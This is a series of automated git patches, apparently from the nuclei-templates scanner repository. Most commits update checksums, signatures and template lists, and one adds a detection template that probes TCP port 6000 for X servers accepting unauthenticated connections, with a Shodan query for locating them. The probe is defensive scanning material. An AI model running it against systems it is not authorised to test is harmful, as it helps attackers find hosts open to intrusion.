http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c -http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 +http/default-logins/abb/cs141-default-login.yaml:9253c508b01a0f209fcff3a51daae99417304a7a http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa911e9caccb31fc65f http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b @@ -8948,7 +8948,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:58e12f02e2f66ec3074310e1cc9a626e78570a64 +templates-checksum.txt:746226f00c9586db391b6de02a5a799f94863c22 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 7c71421f7bb9e3f77aff2daf1a25d5f157a9f037 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 08:59:03 +0000 Subject: [PATCH 23/46] Auto Template Signing [Thu Aug 1 08:59:03 UTC 2024] :robot: --- http/default-logins/abb/cs141-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index 92de98ea9f..2de08ea9a8 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -60,5 +60,4 @@ http: - type: kval kval: - accessToken - -# digest: 4a0a00473045022100d7669b05e2b655bf42189bd5a1f1c6d312b55ef0f2226d74125a06af7716cb4c02200e5bbd064a3fa4485e6a2e29f0df4dae44e75252a08137974489591ca8e284c5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dfd6d5cbd40bcd14ebf17611a4e5093f8d1f6782 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:36:53 +0530 Subject: [PATCH 24/46] Create x11-unauth-access.yaml --- .../x11/x11-unauth-access.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 javascript/misconfiguration/x11/x11-unauth-access.yaml diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml new file mode 100644 index 0000000000..2305b2f82c --- /dev/null +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -0,0 +1,44 @@ +id: x11-unauth-access + +info: + name: x11 - Unauthenticated + author: pussycat0x + severity: high + description: | + To check if you can connect to a remote X server, send an X11 initial connection request to TCP port 6000+n (where n is the display number). The response success byte (0x00 or 0x01) indicates if you are allowed; if successful, the script will display "X server access is granted," confirming that an attacker can connect to the X server + reference: + - https://nmap.org/nsedoc/scripts/x11-access.html + - https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11 + - https://www.hackingarticles.in/penetration-testing-on-x11-server/ + tags: x11,network,js,remote,unauth + +javascript: + - pre-condition: | + isPortOpen(Host,Port); + code: | + let packet = bytes.NewBuffer(); + const c = require("nuclei/net"); + const cmd = "l\u0000\u000b\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000" + packet.WriteString(cmd) + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.SendHex(packet.Hex()); + const result = conn.RecvFull(); + + let accessGranted; + + if (result[0] === 1) { + accessGranted = true; + } else { + conn.Close(); + } + + accessGranted + + args: + Host: "{{Host}}" + Port: 6000 + + matchers: + - type: dsl + dsl: + - response From 0789b884de6a5d655da1ae09b3f3fa9604fa2e58 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 09:53:52 +0000 Subject: [PATCH 25/46] Auto Generated New Template Addition List [Thu Aug 1 09:53:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 576ef8add6..826e1449da 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-27043.yaml +http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml http/cves/2024/CVE-2024-39903.yaml From 5d97b2b8d3278f1cf05dfd9bcc81a7c01283672a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 09:54:03 +0000 Subject: [PATCH 26/46] Auto Generated Templates Checksum [Thu Aug 1 09:54:03 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b33d9df864..db22f19b5f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,6 +3293,7 @@ http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 +http/cves/2023/CVE-2023-43323.yaml:2e5bd5bf809768cf84ece72055527e19c9ccb016 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 @@ -3545,7 +3546,7 @@ http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c -http/default-logins/abb/cs141-default-login.yaml:9253c508b01a0f209fcff3a51daae99417304a7a +http/default-logins/abb/cs141-default-login.yaml:7459372f8a0210fab32ec1c2e3672256bc8ba14a http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa911e9caccb31fc65f http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b @@ -8948,7 +8949,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:746226f00c9586db391b6de02a5a799f94863c22 +templates-checksum.txt:0ff909d43e98093675aad0309dcbae93fd5cc02f vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 021cf64116fee549731e837a791f489fd22669d5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 09:54:45 +0000 Subject: [PATCH 27/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f583462847..a9b959c86b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-27043.yaml' + - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' From 594ef2f5dcba3213f6b571080eafeb5ec45a730f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 09:55:36 +0000 Subject: [PATCH 28/46] Auto Template Signing [Thu Aug 1 09:55:36 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43323.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-43323.yaml b/http/cves/2023/CVE-2023-43323.yaml index 1666dcce0a..0230986980 100644 --- a/http/cves/2023/CVE-2023-43323.yaml +++ b/http/cves/2023/CVE-2023-43323.yaml @@ -61,3 +61,4 @@ http: words: - "http" - "dns" +# digest: 4b0a00483046022100af09f14a1bcd4be57e652230a0edeb33311aa7089079b7b43a89ab4d6e5d2828022100fa18b8c9cd1e37934659cad5d0a55252f7a75aeb4e9e84d7fa33b68f17c6c97d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 750e024016021b44523c49794ba86a253bce464c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:05:36 +0000 Subject: [PATCH 29/46] Auto Generated New Template Addition List [Thu Aug 1 10:05:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 826e1449da..bf6aef5c0c 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml +http/cves/2024/CVE-2024-34061.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-6205.yaml From de55b7f4827bb7e490a45a4f520b1beae03c83b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:05:41 +0000 Subject: [PATCH 30/46] Auto Generated Templates Checksum [Thu Aug 1 10:05:41 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index db22f19b5f..6fa7aff90b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,7 +3293,7 @@ http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 -http/cves/2023/CVE-2023-43323.yaml:2e5bd5bf809768cf84ece72055527e19c9ccb016 +http/cves/2023/CVE-2023-43323.yaml:5183007ec76bec6426ec05e856fa9449e058935a http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 @@ -3486,6 +3486,7 @@ http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 +http/cves/2024/CVE-2024-34061.yaml:da7614ca17ae070623437e3d94a2d4f97faa9efb http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb @@ -8949,7 +8950,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0ff909d43e98093675aad0309dcbae93fd5cc02f +templates-checksum.txt:11f98f8081e81e31cf9f66ca6d741003e367791c vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 17ae4e84f06e37d6a03b0d9fada3a6279e3ffbb0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:06:18 +0000 Subject: [PATCH 31/46] Auto Generated New Template Addition List [Thu Aug 1 10:06:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bf6aef5c0c..b1f4600ab2 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-7120.yaml http/cves/2024/CVE-2024-7188.yaml +http/misconfiguration/changedetection-unauth.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml http/misconfiguration/manage-cabinet-register.yaml From 2c178122cf0d74d90d8004ce244d7a8122cfa35d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:06:22 +0000 Subject: [PATCH 32/46] Auto Generated Templates Checksum [Thu Aug 1 10:06:22 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6fa7aff90b..654f3f3495 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5562,6 +5562,7 @@ http/misconfiguration/browserless-debugger.yaml:c0e3296fa2d52ff89e0346546043721a http/misconfiguration/cadvisor-exposure.yaml:d236dc86e5e131b98b7c5c5f24d85e219448a249 http/misconfiguration/casdoor-users-password.yaml:bec0721cb2860bc3be2725338624cbeaadb20e1d http/misconfiguration/cgi-test-page.yaml:ce97987c25f63e9ef113fc09ddc2daf5a98c666c +http/misconfiguration/changedetection-unauth.yaml:071cf4423da1b833d7dbc7d4669943e388272534 http/misconfiguration/chatgpt-web-unauth.yaml:723a53934bc70af11866cc57d2cc46c3cf5ae119 http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342b593c8404 http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3 @@ -8950,7 +8951,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:11f98f8081e81e31cf9f66ca6d741003e367791c +templates-checksum.txt:2f38a0a62a87faea798a1bf7d93ff3fe454b1bcd vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From a13e1eed84053c33a56e4ba756ad674d1c41205c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:06:24 +0000 Subject: [PATCH 33/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a9b959c86b..c68e788acd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' + - 'http/cves/2024/CVE-2024-34061.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' From e985584e3bbb46af869c7265de8a5f8560803671 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:07:14 +0000 Subject: [PATCH 34/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c68e788acd..b6ad0100c9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/cves/2024/CVE-2024-6922.yaml' - 'http/cves/2024/CVE-2024-7120.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' + - 'http/misconfiguration/changedetection-unauth.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' - 'http/misconfiguration/manage-cabinet-register.yaml' From 47cd95972d5ac2f5cb868831297e838a373174a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:07:30 +0000 Subject: [PATCH 35/46] Auto Template Signing [Thu Aug 1 10:07:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34061.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml index 8796781bac..cfdf3bafe9 100644 --- a/http/cves/2024/CVE-2024-34061.yaml +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -60,3 +60,4 @@ http: regex: - 'name="csrf_token" value="([^"]+)"' internal: true +# digest: 4b0a00483046022100a26d7a719f6bde174ab2a4ce1f996610abd24a3fe1dd22367ddfad90424a604a022100ceb749dac5236c2e827d447cb1709f0895ce46da346dead8eb19b2634d6ab9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 455ab189f7c14f5377de3fee9af16edbd6a24b26 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:07:50 +0000 Subject: [PATCH 36/46] Auto Generated New Template Addition List [Thu Aug 1 10:07:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b1f4600ab2..96e12e24fb 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml +http/cves/2024/CVE-2024-24763.yaml http/cves/2024/CVE-2024-34061.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml From ed5dda4c20ac927d7396fc2d7f1ab9c774890521 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:07:55 +0000 Subject: [PATCH 37/46] Auto Generated Templates Checksum [Thu Aug 1 10:07:55 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 654f3f3495..be411e29a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3435,6 +3435,7 @@ http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c http/cves/2024/CVE-2024-24565.yaml:3ce11e2d0ce96ee70c97b3442e730fdcc23b2bb6 +http/cves/2024/CVE-2024-24763.yaml:ea375daef2a1ce97faffb38d4cdee840e3fd3870 http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -8951,7 +8952,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2f38a0a62a87faea798a1bf7d93ff3fe454b1bcd +templates-checksum.txt:a32d41fc8be7f1c1fb116d782da63bca2e3e552c vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From d56fcf18ae92c3171b60b10037b1cde42dd68e29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:08:43 +0000 Subject: [PATCH 38/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b6ad0100c9..293bf0a5d7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' + - 'http/cves/2024/CVE-2024-24763.yaml' - 'http/cves/2024/CVE-2024-34061.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' From 8bf5b35eb94f68d88077fe078f1dfe1dfe2c8e1f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Aug 2024 15:41:36 +0530 Subject: [PATCH 39/46] Update x11-unauth-access.yaml --- javascript/misconfiguration/x11/x11-unauth-access.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml index 2305b2f82c..b22f12fe53 100644 --- a/javascript/misconfiguration/x11/x11-unauth-access.yaml +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -1,7 +1,7 @@ id: x11-unauth-access info: - name: x11 - Unauthenticated + name: x11 - Unauthenticated Access author: pussycat0x severity: high description: | @@ -10,6 +10,10 @@ info: - https://nmap.org/nsedoc/scripts/x11-access.html - https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11 - https://www.hackingarticles.in/penetration-testing-on-x11-server/ + metadata: + shodan-query: "Open X Server:" + verified: true + max-request: 1 tags: x11,network,js,remote,unauth javascript: From f7971168d49d6bf688773ee6c15991989d7ce426 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:14:33 +0000 Subject: [PATCH 40/46] Auto Generated New Template Addition List [Thu Aug 1 10:14:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96e12e24fb..bd1edb6c27 100644 --- a/.new-additions +++ b/.new-additions @@ -20,3 +20,4 @@ http/osint/user-enumeration/substack.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +javascript/misconfiguration/x11/x11-unauth-access.yaml From f9180a83cc8de48dbd75dc5ed9ecf05bb4910157 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:14:42 +0000 Subject: [PATCH 41/46] Auto Generated Templates Checksum [Thu Aug 1 10:14:42 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index be411e29a9..d132762e06 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3487,7 +3487,7 @@ http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34061.yaml:da7614ca17ae070623437e3d94a2d4f97faa9efb +http/cves/2024/CVE-2024-34061.yaml:477bd7796719149a33356902f38fd7c4c1bc856f http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb @@ -8769,6 +8769,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 +javascript/misconfiguration/x11/x11-unauth-access.yaml:d1b21a89308ab060b98e68f915d02ab1b1a17de0 javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 @@ -8952,7 +8953,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a32d41fc8be7f1c1fb116d782da63bca2e3e552c +templates-checksum.txt:bab688b9113d21c436462a88055b93aae6ef6616 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 2a30c4f77831672a17a6c5ea83a9712cfdc1a1bd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:16:00 +0000 Subject: [PATCH 42/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 293bf0a5d7..a1cada6964 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' + - 'javascript/misconfiguration/x11/x11-unauth-access.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 6a14558d5731d61d8d23ba23ac6e02075c75d15b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:16:27 +0000 Subject: [PATCH 43/46] Auto Template Signing [Thu Aug 1 10:16:27 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24763.yaml | 1 + http/misconfiguration/changedetection-unauth.yaml | 1 + javascript/misconfiguration/x11/x11-unauth-access.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-24763.yaml b/http/cves/2024/CVE-2024-24763.yaml index 7b906aabe4..4be6a2a58b 100644 --- a/http/cves/2024/CVE-2024-24763.yaml +++ b/http/cves/2024/CVE-2024-24763.yaml @@ -44,3 +44,4 @@ http: part: header regex: - 